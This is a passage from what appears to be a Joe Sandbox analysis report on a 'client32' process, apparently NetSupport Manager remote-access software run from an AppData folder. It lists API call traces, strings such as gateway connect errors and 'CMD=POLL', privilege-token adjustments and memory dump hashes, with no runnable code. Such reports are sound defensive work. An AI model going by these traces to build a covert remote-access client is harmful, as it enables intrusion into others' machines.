                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109DA42
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1109DA73
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00002000,Function_0009D030,00000000,00000000,00000030), ref: 1109DA8D
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109DABC
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109DAC2
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109DAC8
                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 1109DACE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                                                                                                                                    • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                                                                                                                                    • API String ID: 3291243470-2792520954
                                                                                                                                                                                                    • Opcode ID: 7d2eca5f92aeb90d6110f97020967db0a84e126fbda8524f3f6ea0900cc0b1d0
                                                                                                                                                                                                    • Instruction ID: d0fdbac131d557a40c9b368ac235ec40647fb92da06757c3bb5e6f0a5f2f1ed9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d2eca5f92aeb90d6110f97020967db0a84e126fbda8524f3f6ea0900cc0b1d0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F1270B5E002599FDB20DF65CCD4AAEB7FAFB88304F0045A9E60D97240E771A984CF61

Control-flow Graph (figure: executed / not executed basic blocks, graph data omitted)
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 68592A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 68592ACB
                                                                                                                                                                                                      • Part of subcall function 68592A90: _strrchr.LIBCMT ref: 68592ADA
                                                                                                                                                                                                      • Part of subcall function 68592A90: _strrchr.LIBCMT ref: 68592AEA
                                                                                                                                                                                                      • Part of subcall function 68592A90: wsprintfA.USER32 ref: 68592B05
                                                                                                                                                                                                      • Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
                                                                                                                                                                                                      • Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
                                                                                                                                                                                                      • Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(WinInet.dll), ref: 685A7057
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(685DB898), ref: 685A70DF
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 685A70EF
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 685A7115
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 685A713B
                                                                                                                                                                                                    • WSAStartup.WSOCK32(00000101,685DB91A), ref: 685A7167
                                                                                                                                                                                                    • _malloc.LIBCMT ref: 685A71A3
                                                                                                                                                                                                      • Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
                                                                                                                                                                                                      • Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
                                                                                                                                                                                                      • Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE
                                                                                                                                                                                                    • _memset.LIBCMT ref: 685A71D3
                                                                                                                                                                                                    • _calloc.LIBCMT ref: 685A7214
                                                                                                                                                                                                    • _malloc.LIBCMT ref: 685A728B
                                                                                                                                                                                                    • _memset.LIBCMT ref: 685A72C1
                                                                                                                                                                                                    • _malloc.LIBCMT ref: 685A72CD
                                                                                                                                                                                                    • _memset.LIBCMT ref: 685A7303
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 685A7361
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00004000,685A6BA0,00000000,00000000,685DBACC), ref: 685A737E
                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,00000001), ref: 685A73AC
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SystemUtil\Support\,00000104), ref: 685A7430
                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\user\AppData\Roaming\SystemUtil\Support\pci.ini), ref: 685A74B0
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(nsmtrace), ref: 685A74C0
                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 685A7566
                                                                                                                                                                                                    • timeBeginPeriod.WINMM(00000001), ref: 685A7573
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
• Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
• Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
• API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
• String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$305090$C:\Users\user\AppData\Roaming\SystemUtil\Support\$C:\Users\user\AppData\Roaming\SystemUtil\Support\pci.ini$General$HTCTL32$NSM832428$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
• API String ID: 3160247386-2308324566
• Opcode ID: 358fa19de47a9d42cca085a42e9e9b1970fbc8db8da311e552db64a93da40cca
• Instruction ID: bf6727e0cf09bfdcc17968a086c2d736e5d68eb3cb2f468a3d27a176817d2a7a
• Opcode Fuzzy Hash: 358fa19de47a9d42cca085a42e9e9b1970fbc8db8da311e552db64a93da40cca
• Instruction Fuzzy Hash: E3D1F6B5940305AFDB10AF688CC496E7BF9EB49348BC6442AFD59D7341E770AC408B9D

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(WinInet.dll,24DE4E77,74DF23A0,?,00000000), ref: 11029265
• GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110292FF
• InternetCloseHandle.WININET(000000FF), ref: 1102930D
• SetLastError.KERNEL32(00000078), ref: 11029313
• GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029351
• GetLastError.KERNEL32 ref: 11029372
• _free.LIBCMT ref: 1102937E
• GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110293A1
• GetProcAddress.KERNEL32(?,InternetOpenA), ref: 110293DB
• InternetOpenA.WININET(11190240,?,?,000000FF,00000000), ref: 110293FA
• SetLastError.KERNEL32(00000078), ref: 11029404
• SetLastError.KERNEL32(00000078), ref: 11029411
• SetLastError.KERNEL32(00000078), ref: 1102941B
• _free.LIBCMT ref: 11029425
  • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
  • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
• GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110294A5
• SetLastError.KERNEL32(00000078), ref: 110294BE
• GetProcAddress.KERNEL32(?,InternetConnectA), ref: 110294D1
• InternetConnectA.WININET(000000FF,111955E0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 110294EE
• GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102950A
• SetLastError.KERNEL32(00000078), ref: 11029523
• GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029549
• HttpOpenRequestA.WININET(?,GET,111955F8,00000000,00000000,00000000,8040F000,00000000), ref: 1102956F
• GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 1102959D
• GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029703
• SetLastError.KERNEL32(00000078), ref: 110297D0
• GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029822
• SetLastError.KERNEL32(00000078), ref: 11029839
• FreeLibrary.KERNEL32(?), ref: 1102984A
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AddressProc$ErrorLast$Internet$FreeLibraryOpen_free$CloseConnectHandleHeapHttpLoadRequest
• String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
• API String ID: 1980367711-913974648
• Opcode ID: 3d8697c672572dd310c1a2e1d47d1d0dada750d652324d085b14bc85afb6b7cf
• Instruction ID: 8a892d803199c7046cb733a2a01a4e5fa1610c0a6219e27d09306c56163d799e
• Opcode Fuzzy Hash: 3d8697c672572dd310c1a2e1d47d1d0dada750d652324d085b14bc85afb6b7cf
• Instruction Fuzzy Hash: AA127FB1E002299BDB11CFA9CC88A9EFBF4FF88344F60856AE555F7240EB745940CB61

Control-flow Graph

APIs
  • Part of subcall function 68595840: inet_ntoa.WSOCK32(00000080,?,00000000,?,68598F91,00000000,00000000,685DB8DA,?,00000080), ref: 68595852
• EnterCriticalSection.KERNEL32(685DB898,?,00000000,00000000), ref: 6859AA11
• LeaveCriticalSection.KERNEL32(685DB898), ref: 6859AA58
• LeaveCriticalSection.KERNEL32(685DB898), ref: 6859AA68
• LeaveCriticalSection.KERNEL32(685DB898), ref: 6859AA94
• WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6859AB0B
• socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6859AB4E
• WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6859AB5A
• #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AB8E
• #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6859ABB1
• #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6859ABE3
• bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC18
• WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC21
• closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC29
• htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC65
• WSASetBlockingHook.WSOCK32(685963A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC76
• WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC8F
• WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC96
• closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC9C
• WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859ACFD
• WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AD04
• closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AD0A
• WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AD45
• EnterCriticalSection.KERNEL32(685DB898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AD4F
• InitializeCriticalSection.KERNEL32(-685DCB4A), ref: 6859ADE6
  • Part of subcall function 68598FB0: _memset.LIBCMT ref: 68598FE4
  • Part of subcall function 68598FB0: getsockname.WSOCK32(?,?,00000010,?,02D42E90,?), ref: 68599005
• getsockname.WSOCK32(00000000,?,?), ref: 6859AE4B
• LeaveCriticalSection.KERNEL32(685DB898), ref: 6859AE60
• GetTickCount.KERNEL32 ref: 6859AE6C
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 6859AE7A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Cannot connect to gateway %s, error %d, xrefs: 6859ACA6
                                                                                                                                                                                                    • Cannot connect to gateway %s via web proxy, error %d, xrefs: 6859AD14
                                                                                                                                                                                                    • *TcpNoDelay, xrefs: 6859ABB8
                                                                                                                                                                                                    • Connect error to %s using hijacked socket, error %d, xrefs: 6859AB17
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
                                                                                                                                                                                                    • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                                                                                                                                                    • API String ID: 692187944-2561115898
                                                                                                                                                                                                    • Opcode ID: e5e2543116c1c178c8091a40c7a64bb7115ccdae992da7a805c5cec0014acb38
                                                                                                                                                                                                    • Instruction ID: 19e6a8f323f29c85e24850b2e4ca5934d0a94c2982567c8896835727aa1d9333
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5e2543116c1c178c8091a40c7a64bb7115ccdae992da7a805c5cec0014acb38
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5E19375A402149FDF11DF68D890BEDB3B5EF88315F8041AAED19A7280DB709E84CFA5
APIs
• #16.WSOCK32(00000000,?,a3Zh,00000000,00000000,?,00000007), ref: 6859924C
• WSAGetLastError.WSOCK32(00000000,?,a3Zh,00000000,00000000,?,00000007), ref: 6859925B
• GetTickCount.KERNEL32 ref: 68599274
• Sleep.KERNEL32(00000001,00000000,?,a3Zh,00000000,00000000,?,00000007), ref: 685992A8
• GetTickCount.KERNEL32 ref: 685992B0
• Sleep.KERNEL32(00000014), ref: 685992BC
Strings
• ReadSocket - Connection has been closed by peer, xrefs: 685992E0
• e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 68599226
• a3Zh, xrefs: 68599244
• ReadSocket - Error %d reading response, xrefs: 685992F7
• hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6859922B
• ReadSocket - Would block, xrefs: 6859928A
• *RecvTimeout, xrefs: 6859927B
Memory Dump Source
• Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
• Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_68590000_client32.jbxd
Yara matches
Similarity
• API ID: CountSleepTick$ErrorLast
• String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$a3Zh$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
• API String ID: 2495545493-1096684884
• Opcode ID: b5925360083a57d19c58249876366d12ba0b5fca48a5ea9abd192e68da549f5a
• Instruction ID: edc879204cff4bdf9013b3b646520309aa2927875271b2d62d72d76eb8c5f498
• Opcode Fuzzy Hash: b5925360083a57d19c58249876366d12ba0b5fca48a5ea9abd192e68da549f5a
• Instruction Fuzzy Hash: 2031A23AE80248EFDF10DFBCE988B9EB7F4EB85315F8044A9E908D7140E73199508B91
APIs
• GetSystemTime.KERNEL32(?,?,?,97A2354D,25DC70BF,97A234B3,FFFFFFFF,00000000), ref: 685A31E2
• SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,685CECB0), ref: 685A31EC
• GetSystemTime.KERNEL32(?,25DC70BF,97A234B3,FFFFFFFF,00000000), ref: 685A322A
• SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,685CECB0), ref: 685A3234
• EnterCriticalSection.KERNEL32(685DB898,?,97A2354D), ref: 685A32BE
• LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 685A32D3
• GetCurrentThreadId.KERNEL32 ref: 685A334D
  • Part of subcall function 685ABA20: __strdup.LIBCMT ref: 685ABA3A
  • Part of subcall function 685ABB00: _free.LIBCMT ref: 685ABB2D
Strings
Memory Dump Source
• Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
• Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_68590000_client32.jbxd
Yara matches
Similarity
• API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
• String ID: 1.1$ACK=1$CMD=POLL$INFO=1
• API String ID: 1510130979-3441452530
• Opcode ID: 45c4023052b712fd4c58dc05647e5a7416511ec50250fa07931a60422d5bb665
• Instruction ID: 49227012a016f7c2ab4a82d9b13a2c96863fc9b37b58f8714e9526c00b33a5b1
• Opcode Fuzzy Hash: 45c4023052b712fd4c58dc05647e5a7416511ec50250fa07931a60422d5bb665
• Instruction Fuzzy Hash: B4614176904208EFCF14DFA4D884EEEB7B9FF49314F84451EE816A7240EB34A944CBA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 11095CA4
                                                                                                                                                                                                    • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134B2B), ref: 11095CBE
                                                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000001,111BBFCC,?,?,?,?,?,?,?,11134B2B), ref: 11095CDB
                                                                                                                                                                                                    • CoUninitialize.OLE32(?,?,?,?,?,?,11134B2B), ref: 11095CF9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
• API ID: CreateFromInitializeInstanceProgUninitialize
• String ID: HNetCfg.FwMgr$ICF Present:
• API String ID: 3222248624-258972079
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
• API ID: _memset
• String ID: NBCTL32.DLL$_License$serial_no
• API String ID: 2102423945-35127696
APIs
• SetUnhandledExceptionFilter.KERNEL32(1102DF30,?,00000000), ref: 11030B34
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
• API ID: ExceptionFilterUnhandled
• String ID: Client32$NSMWClass$NSMWClass
• API String ID: 3192549508-611217420
APIs
• GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,74DEF550,?,00000000), ref: 1109DC58
• GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DC74
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,007AF420,007AF420,007AF420,007AF420,007AF420,007AF420,007AF420,111EAB1C,?,00000001,00000001), ref: 1109DCA0
• EqualSid.ADVAPI32(?,007AF420,?,00000001,00000001), ref: 1109DCB3
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
• API ID: InformationToken$AllocateEqualInitialize
• String ID:
• API String ID: 1878589025-0
APIs
• GetCurrentProcess.KERNEL32(000F01FF,?,1102FAC3,00000000,00000000,00080000,24DE4E77,00080000,00000000,00000000), ref: 1109C77D
• OpenProcessToken.ADVAPI32(00000000), ref: 1109C784
• LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C795
• AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C7B9
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2349140579-0
                                                                                                                                                                                                    • Opcode ID: fed7014fb2c6176395dd00bdbf9b6dacad7388df0a8d1a1889bfa0ec87585418
